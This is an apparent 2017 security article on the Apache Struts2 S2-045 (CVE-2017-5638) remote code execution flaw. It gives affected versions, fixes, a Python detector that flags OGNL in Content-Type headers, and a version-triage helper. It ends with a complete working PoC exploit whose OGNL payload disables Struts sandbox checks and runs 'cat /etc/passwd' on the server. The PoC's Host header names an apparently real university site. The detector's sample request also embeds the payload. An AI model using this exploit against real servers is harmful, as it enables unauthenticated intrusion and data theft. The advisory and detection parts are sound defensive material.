Mar 07, 2017

Apache Struts2 remote code execution vulnerability disclosed (S2-045, CVE-2017-5638)

It has been more than six months since FreeBuf last reported a Struts 2 vulnerability. This one is an RCE (remote code execution) vulnerability: put simply, the Jakarta Multipart resolver used for file uploads can be exploited to execute code remotely. The vulnerability was reported by Nike Zheng of DBAPPSecurity.
Apache Struts is an open source MVC framework, maintained by the Apache Software Foundation, for building enterprise-class Java web applications.
Vulnerability number
S2-045 / CVE-2017-5638
Vulnerability description
Struts 2 does not properly handle errors raised while the Jakarta Multipart parser processes a file-upload request. The request's Content-Type header is copied into the error message, and that message is then evaluated as an OGNL expression, so a remote attacker who sends a crafted Content-Type header can execute arbitrary commands on the server without authentication.
The struts.multipart.parser key in default.properties documents two values, jakarta and pell (older releases also had a third, cos). The Jakarta parser is a standard component of the Struts 2 framework and is the one enabled by default, which is why this vulnerability has to be taken seriously: every Struts 2 application that has not explicitly switched parsers is exposed.
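To make the description concrete, here is a small Python 3 checker added for this article (it is not the original author's code and not part of Struts) that parses a raw HTTP request and flags a Content-Type value carrying an OGNL expression of the kind S2-045 uses. It flags any Content-Type containing an OGNL opener, not only the published payload, and separately marks a multipart request without a boundary, which is the parse-error path the bug lives on. The two sample requests and the host example.test are constructed for the example; the marker strings come from the PoC later on this page.

```python
import re

# Opening token of an OGNL expression. A legitimate Content-Type value never
# contains one, so its mere presence in this header is a strong signal.
OGNL_OPEN = re.compile(r"[%$]\{")

# Fragments of the public S2-045 payload, reported to give the analyst context.
PAYLOAD_FRAGMENTS = (
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "#_memberAccess",
    "java.lang.ProcessBuilder",
    "ServletActionContext",
)


def parse_request_headers(raw):
    """Split the header block of a raw HTTP request into {lower-name: [values]}.

    Every occurrence of a header is kept so a duplicated Content-Type cannot
    hide the payload behind a harmless first copy."""
    head = raw.partition("\r\n\r\n")[0]
    headers = {}
    for line in head.replace("\r\n", "\n").split("\n")[1:]:  # [0] is the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def classify_content_type(value):
    """Return (verdict, reason) for one Content-Type value: benign, suspicious or attack."""
    if OGNL_OPEN.search(value):
        hits = [f for f in PAYLOAD_FRAGMENTS if f in value]
        reason = "OGNL expression in Content-Type"
        if hits:
            reason += " with " + ", ".join(hits)
        return "attack", reason
    lowered = value.lower()
    if "multipart/form-data" in lowered and "boundary=" not in lowered:
        # Jakarta parser selected but the header cannot be parsed: this is the
        # error path S2-045 abuses, so it deserves a look even without OGNL.
        return "suspicious", "multipart/form-data without a boundary"
    return "benign", ""


def inspect_request(raw):
    """Classify a raw request by the worst verdict over all its Content-Type values."""
    rank = {"benign": 0, "suspicious": 1, "attack": 2}
    worst = ("benign", "")
    for value in parse_request_headers(raw).get("content-type", []):
        verdict = classify_content_type(value)
        if rank[verdict[0]] > rank[worst[0]]:
            worst = verdict
    return worst


# Constructed sample requests (example.test is not a real host).
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryA1B2\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
S2045_REQUEST = (
    "POST /index.action HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: %{(#nike='multipart/form-data')"
    ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))"
    ".(#cmd='cat /etc/passwd')"
    ".(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.start())}\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_UPLOAD), ("s2-045", S2045_REQUEST)):
        print(label, inspect_request(req))
```

The check is a signature on the header value, not an OGNL parser: it will catch any `%{` or `${` wrapper regardless of what is inside, and the fragment list only enriches the reason string. Run it over proxy or WAF captures where the full request headers are available; ordinary access logs do not record Content-Type.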
The scope of the impact
Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10
If you use the Jakarta-based file upload Multipart resolver, upgrade to Apache Struts 2.3.32 or 2.5.10.1; alternatively, switch to a different Multipart resolver implementation. Because Jakarta is the default, assume an application in these version ranges is affected unless struts.multipart.parser has been explicitly set to another value.
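To turn these ranges into something that can be run against an inventory, here is a Python 3 helper added for this article (not the original author's code and not part of Struts): it parses a version string or a struts2-core jar filename, says whether it falls in an affected range and which release fixes it, and takes the configured struts.multipart.parser value into account. The jar paths below are a constructed sample inventory, not real hosts.

```python
import re

# Affected ranges and fix versions as given above (bounds are inclusive).
AFFECTED_RANGES = (
    ((2, 3, 5), (2, 3, 31), "2.3.32"),
    ((2, 5), (2, 5, 10), "2.5.10.1"),
)
JAR_RE = re.compile(r"struts2-core-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text):
    """Turn '2.5.10.1' or 'struts2-core-2.3.31.jar' into a comparable int tuple."""
    m = JAR_RE.search(text)
    if m:
        text = m.group(1)
    if not re.fullmatch(r"\d+(?:\.\d+)*", text):
        raise ValueError("unrecognised Struts version: %r" % text)
    return tuple(int(p) for p in text.split("."))


def assess(text, multipart_parser="jakarta"):
    """Triage one deployment.

    text: version string or struts2-core jar filename
    multipart_parser: value of struts.multipart.parser ('jakarta' is the default)
    Returns (affected_version, exploitable_via_s2045, fix_version)."""
    version = parse_version(text)
    for low, high, fix in AFFECTED_RANGES:
        # Tuple comparison gives (2, 5) <= (2, 5, 0) and (2, 5, 10) < (2, 5, 10, 1),
        # so 2.5 is inside the range and 2.5.10.1 is outside it, as in the advisory.
        if low <= version <= high:
            # Only the Jakarta parser evaluates the Content-Type error message, so a
            # different parser closes this path; the jar still needs the upgrade.
            return True, multipart_parser == "jakarta", fix
    return False, False, None


def triage_jars(jar_paths, multipart_parser="jakarta"):
    """Summarise jar paths (e.g. from `find / -name 'struts2-core-*.jar'`)."""
    report = {}
    for path in jar_paths:
        name = path.rsplit("/", 1)[-1]
        if JAR_RE.search(name):
            report[path] = assess(name, multipart_parser)
    return report


# Constructed sample inventory, one jar per deployment.
SAMPLE_JARS = [
    "/opt/app1/WEB-INF/lib/struts2-core-2.3.31.jar",
    "/opt/app2/WEB-INF/lib/struts2-core-2.5.10.1.jar",
    "/opt/app3/WEB-INF/lib/struts2-core-2.3.4.jar",
    "/opt/app4/WEB-INF/lib/struts2-core-2.5.jar",
]

if __name__ == "__main__":
    for path, (affected, exploitable, fix) in triage_jars(SAMPLE_JARS).items():
        status = "affected, upgrade to %s" % fix if affected else "not affected"
        if affected and not exploitable:
            status += " (non-Jakarta parser configured)"
        print(path, status)
```

The parser argument only changes the exploitable flag; a non-Jakarta parser is reported as not reachable through this particular bug, but the affected version is still flagged for upgrade, which is the safer call since the framework itself carries the defect.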
Vulnerability PoC
#!/usr/bin/env python
# S2-045 PoC (Python 2, needs the `poster` package). It sends a multipart upload
# whose Content-Type header is an OGNL expression; Struts evaluates that header
# while reporting the upload error, runs `cat /etc/passwd` on the server and
# streams the output back in the HTTP response.
import sys
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

# The OGNL payload. Three pieces are garbled or missing on the page and are
# restored from the public S2-045 payload: the leading (#nike=...) term (the
# header must contain "multipart/form-data" for the Jakarta parser to be
# selected), the "#dm=@ognl.OgnlContext@..." term, and the IOUtils.copy call.
PAYLOAD = (
    "%{(#nike='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    # Older Struts: replace the member-access guard directly; newer Struts:
    # clear the OgnlUtil exclusion lists first, then install the permissive guard.
    "(#_memberAccess?(#_memberAccess=#dm):"
    "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context.setMemberAccess(#dm))))."
    # Pick a shell for the target OS and run the command.
    "(#cmd='cat /etc/passwd')."
    "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    "(#p=new java.lang.ProcessBuilder(#cmds))."
    "(#p.redirectErrorStream(true))."
    "(#process=#p.start())."
    # Copy the command output into the HTTP response body.
    "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    "(#ros.flush())}"
)

def poc(url):
    register_openers()  # lets urllib2 stream the multipart body that poster builds
    datagen, headers = multipart_encode({"image1": open("tmp.txt", "rb")})
    # Keep poster's Content-Length (its streaming handler requires it) and
    # replace the Content-Type with the payload; that header is what gets evaluated.
    headers["Content-Type"] = PAYLOAD
    headers["Host"] = "alumnus.shu.edu.cn"
    headers["Referer"] = "alumnus.shu.edu.cn"
    headers["User-Agent"] = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) "
                             "AppleWebKit/537.36 (KHTML, like Gecko) "
                             "Chrome/56.0.2924.87 Safari/537.36")
    request = urllib2.Request(url, datagen, headers=headers)
    response = urllib2.urlopen(request)
    print response.read()

if __name__ == "__main__":
    poc(sys.argv[1])
